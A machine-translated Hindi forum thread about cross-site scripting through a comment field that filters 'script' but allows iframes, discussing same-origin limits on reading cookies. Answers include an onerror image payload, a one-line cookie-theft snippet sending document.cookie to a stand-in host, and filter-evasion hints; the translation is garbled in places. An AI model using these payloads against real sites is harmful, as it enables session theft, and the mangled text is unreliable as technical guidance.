के साथ क्रॉस साइट स्क्रिप्टिंग मैं क्रॉस साइट स्क्रिप्टिंग के साथ प्रयोग कर रहा हूं। मेरे पास एक वेबसाइट है जो उपयोगकर्ताओं को टिप्पणियां डालने और वेबसाइट पर देखने की अनुमति देती है। वेबसाइट टिप्पणी के बावजूद स्ट्रिंग "स्क्रिप्ट" फ़िल्टर करती है लेकिन यह iframes की अनुमति देती है। मैं समझता हूं कि मैं एक आईफ्रेम एम्बेड कर सकता हूं जो कि एक वेबसाइट को इंगित करता है जिसे मैं तैयार करता हूं और मैं जो भी स्क्रिप्ट चाहता हूं उसे चला सकता हूं। मेरा सवाल है: क्या मेरी आईफ्रेम स्क्रिप्ट मूल वेबसाइट द्वारा शुरू की गई कुकीज़ को पढ़ने में सक्षम होगी? मैंने चेतावनी (document.cookie) की कोशिश की है लेकिन यह इसमें कुछ भी नहीं के साथ एक चेतावनी दिखाता है। जब मूल ग्राहक अनुरोध करता है तो मूल वेबसाइट हमेशा एक कुकी सेट करती है। कोई विचार क्या मैं याद कर रहा हूँ?इफ्रेम
इफ्रेम
उत्तर
दोनों आसपास के पेज एक ही डोमेन से आने के लिए की जरूरत है। यह समान उत्पत्ति नीति द्वारा सीमित है, जिसमें कहा गया है कि एक फ्रेम में एक स्क्रिप्ट केवल उसी प्रोटोकॉल पर दिए गए किसी अन्य फ्रेम में डेटा तक पहुंच सकती है, उसी डोमेन नाम का सटीक डोमेन नाम है और उसी पोर्ट पर चल रहा है। यह दोनों फ्रेमों में दस्तावेज़ स्तर को शीर्ष स्तर डोमेन पर सेट करके थोड़ा आराम से किया जा सकता है, और इस प्रकार सबडोमेन से संचार करने के लिए फ्रेम को अनुमति देता है।
हालांकि आप इनपुट करने का प्रयास कर सकते हैं, हालांकि इसे नए ब्राउज़र में अवरुद्ध किया जा सकता है।
सीमित स्क्रिप्ट XSS को रोकने के लिए पर्याप्त नहीं है। कई अन्य तरीके हैं। http://html5sec.org और http://ha.ckers.org/xss.html
अगर मैं सही ढंग से समझता हूं, तो यह दस्तावेज़ ifdomame को दस्तावेज़.डोमेन सेट करने का मामला है, है ना? * (चूंकि इसे मूल दस्तावेज़ में करने से नेटवर्क त्रुटि आती है) * – user2284570
जहाँ तक मुझे पता है, अगर आईफ्रेम का डोमेन मूल वेबसाइट तक पहुंच नहीं सकता है, तो मूल वेबसाइट का डोमेन अलग है, लेकिन other problems हैं। (उदा। पटाखा <img src="asdf" onerror="alert(document.cookie)"/>
टिप्पणी)
आप HTML Purifier तरह somethings उपयोग कर सकते हैं ....
कुकीज़ समान मूल नीति का पालन करें। तो यदि हमला वेबसाइट और पीड़ित वेबसाइट (जो iframes को खोलने की अनुमति देती है) एक ही होस्ट कर रहे हैं तो चल रहे दस्तावेज़.cookie पर पॉपअप कुकीज़ जानकारी को स्वीकार करेगा। चूंकि आपके मामले में वे भिन्न डोमेन होने लगते हैं कुकी चोरी करना संभव नहीं होगा। एक्सएसएस को बेहतर तरीके से रोकने के लिए सी का उपयोग करना है: कोर जेएसटीएल लाइब्रेरी
आपने इसे ध्वनि बना दिया है जैसे आप एक्सएसएस के लिए पेलोड के रूप में कुकी का उपयोग करने की कोशिश कर रहे हैं?
क्या आप वास्तव में कुकी चोरी करने की कोशिश कर रहे हैं?
लेकिन यदि साइट आपको टिप्पणियां डालने और केवल "स्क्रिप्ट" को हटाने की इजाजत दे रही है तो आपके पास कोच्ची चोरी स्क्रिप्ट समेत एक्सएसएस डालने के विकल्पों का एक गुच्छा है।
प्रयास करें इस
javascript:img=new Image();img.src="http://yoursite.com?cookie="+document.cookie;
लेकिन आप के बजाय आप एक से एक माता पिता के पृष्ठ पर पहुंचने के
स्क्रिप्ट
या यूनिकोड 73 63 72 69 70 74
- 1. इफ्रेम
- 2. इफ्रेम
- 3. इफ्रेम
- 4. इफ्रेम लोड में इफ्रेम सामग्री पढ़ना
- 5. फ़्रेम/इफ्रेम
- 6. विजेट - इफ्रेम बनाम जावास्क्रिप्ट
- 7. इफ्रेम से अभिभावक दस्तावेज़
- 8. ओपनआईडी और इफ्रेम
- 9. किसी इफ्रेम पॉपअप
- 10. इफ्रेम रीलोड बटन
- 11. पूर्ण स्क्रीन इफ्रेम
- 12. पारदर्शी इफ्रेम बॉडी
- 13. वेबसाइट भुगतान प्रो (पेपैल) इफ्रेम
- 14. एचटीटीपीएस वेबसाइट पर यूट्यूब इफ्रेम
- 15. यूट्यूब इफ्रेम कोई फुलस्क्रीन बटन
- 16. इफ्रेम और फ़ायरफ़ॉक्स/आईई बग
- 17. JQuery मॉडल बॉक्स और इफ्रेम
- 18. इफ्रेम संवाद को सत्र कुंजी
- 19. इफ्रेम फ़ाइल अपलोड के लिए प्रगति बार?
- 20. फेसबुक ऐप, इफ्रेम चिंताएं (यूआरएल समस्या)
- 21. इफ्रेम फेसबुक एप्लिकेशन और कुकीज़ [इंटरनेट एक्सप्लोरर]
- 22. जेक्री विद एंड इफ्रेम और प्रोग्रेस इंडिकेटर
- 23. इफ्रेम काम नहीं कर रहे हैं
- 24. फेसबुक आईफ्रेम एप्लिकेशन में इफ्रेम आकार की समस्या
- 25. लोडिंग इफ्रेम फेसबुक (एक्स-फ्रेम-विकल्प द्वारा लोड अस्वीकार)
- 26. एक इफ्रेम के बिना एक बाहरी पृष्ठ एम्बेड करें?
- 27. सफारी सत्र वैरिएबल में एकाधिक पृष्ठों के साथ फेसबुक इफ्रेम ऐप
- 28. फ़ायरफ़ॉक्स में काम कर रहे इफ्रेम में सत्र लेकिन इंटरनेट एक्सप्लोरर
- 29. आईई 9 जेएसओएन डेटा इफ्रेम: "क्या आप इस फाइल को खोलना या सहेजना चाहते हैं?"
- 30. जांचें कि क्या पृष्ठ Google क्रोम के लिए इफ्रेम में है
कोशिश कर सकते हैं कर सकते हैं शब्द स्क्रिप्ट सांकेतिक शब्दों में बदलना चाहता हूँ iframe (एक ही डिमैन पर दोनों पेज), 'पैरेंट' ऑब्जेक्ट का उपयोग करें, उदाहरण के लिए 'parent.document.cookie' –